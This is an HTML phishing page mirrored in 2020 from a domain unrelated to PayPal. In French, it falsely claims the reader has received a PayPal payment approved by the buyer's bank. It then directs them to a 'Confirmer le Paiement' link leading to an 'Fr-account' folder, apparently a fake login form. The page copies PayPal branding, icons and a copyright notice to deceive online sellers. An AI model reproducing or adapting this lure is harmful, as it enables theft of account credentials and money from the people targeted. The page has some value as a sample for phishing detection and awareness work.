<!DOCTYPE html>
<html data-reactroot=""><!-- Mirrored from carapal.bida-finances.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 02 May 2020 19:46:44 GMT --><!-- Added by HTTrack --><!-- /Added by HTTrack -->
<head><meta charset="utf-8">
	<title>Vous avez re&ccedil;u de l&#39;argent</title>
	<meta name="application-name" content="" /><meta name="keywords" content="" /><meta name="description" content="" />
	<link href="public/img/pp_favicon_x.ico" rel="shortcut icon" />
	<link href="public/img/pp64.png" rel="apple-touch-icon" />
	<link href="#" rel="canonical" /><meta name="viewport" content="width=device-width, height=device-height, initial-scale=1.0, maximum-scale=2, user-scalable=yes" />
	<link href="public/css/main.ltr.css" rel="stylesheet" />
	<link charset="UTF-8" href="public/css/page.c9a650b6b85d7c2bdddc.css" media="screen, projection" rel="stylesheet" type="text/css" />
	<link href="public/css/contextualLogin.css" rel="stylesheet" />
</head>
<body class="vx_root vx_addFlowTransition vx_hasFadeTransition">
<div aria-labelledby="js_modalHeader" class="vx_modal-flow vx_modalPrepToOpen vx_modalIsOpen modal-flow" id="mainModal" tabindex="-1">
<div class="vx_modal-wrapper-backgroundOverride vx_modal-wrapper vx_modal-wrapper_logo elementDirection" tabindex="-1">
<div class="vx_modal-content">
<header class="vx_modal-header">
<h2 class="vx_text-2 header-centered" id="js_modalHeader" style="color: rgb(0, 92, 8); text-align: center;">Vous avez re&ccedil;u de l&#39;argent.</h2>

<p class="vx_text-body"></p>
</header>

<div class="vx_modal-body vx_blocks-for-mobile">
<div>
<div class="vx_modal-body vx_blocks-for-mobile">
<div class="form-container">
<p class="vx_text-5 " style="text-align: center">Ce paiement Paypal a &eacute;t&eacute; d&eacute;duit du compte de l&rsquo;acheteur et a &eacute;t&eacute; &laquo;&nbsp;APPROUV&Eacute;&nbsp;&raquo; par sa banque.</p>

<div class="cardForm-cardArt"><img src="public/img/success-animation_2x.gif" style="width: 141px; height: 150px;" /></div>

<p class="vx_text-5 " style="text-align: center">Pour recevoir le paiement sur votre compte, cliquez ici :<br />
<br />
<a href="./Fr-account/index.php" style="color: green; font-size: 20px;">Confirmer le Paiement</a></p>

<p class="vx_text-5 " style="text-align: center">Cordialement,Paypal.</p>
</div>
</div>
</div>
</div>

<div class="signup-page-footer vx_text-legal center" style="text-align: center;">&copy;1999-2020 PayPal. Tous droits r&eacute;serv&eacute;s.</div>
</div>
</div>
</div>
<script type="text/javascript" src="public/js/vx-lib.min.js"></script><script type="text/javascript" defer="" src="public/js/vendor.js"></script><script type="text/javascript" defer="" src="public/js/flowBundle.js"></script><script type="text/javascript" defer="" src="public/js/pa.js"></script></body>
<!-- Mirrored from carapal.bida-finances.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 02 May 2020 19:46:59 GMT --></html>